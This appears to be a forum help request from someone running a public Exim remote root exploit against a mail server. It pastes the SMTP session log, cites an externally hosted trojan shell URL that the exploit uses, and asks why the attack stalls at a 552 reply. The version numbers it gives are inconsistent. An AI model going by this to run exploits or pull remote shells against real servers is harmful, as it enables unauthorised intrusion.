Hi!

Coming back to the scene after being away for quite some time I decided to start up trying this famous remote root exploit for exim <6.7.


I happen to have a server running 6.3 running email server for me and my girlfriend. (You can't imagine the facebookspam she gets...)


Anyway, I tried it out and got stuck here:

Code:
220 perl.*******security.net ESMTP Exim 4.63 Mon, 04 Apr 2011 07:43:29 -0500
250-perl.*******security.net Hello ***.ankfest.org [67.159.31.***]
250-SIZE 20971520
Set size to 20971520 !
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
Sending large buffer, please wait...
552 Message size exceeds maximum permitted
250 OK
The trojan is the one included in the exploit on exploit-db: http://amber.anonsecurity.net/shell.txt


But it just stucks after "250 OK", does the 552 means that server is not vuln for the exploit?


Thanks in advance.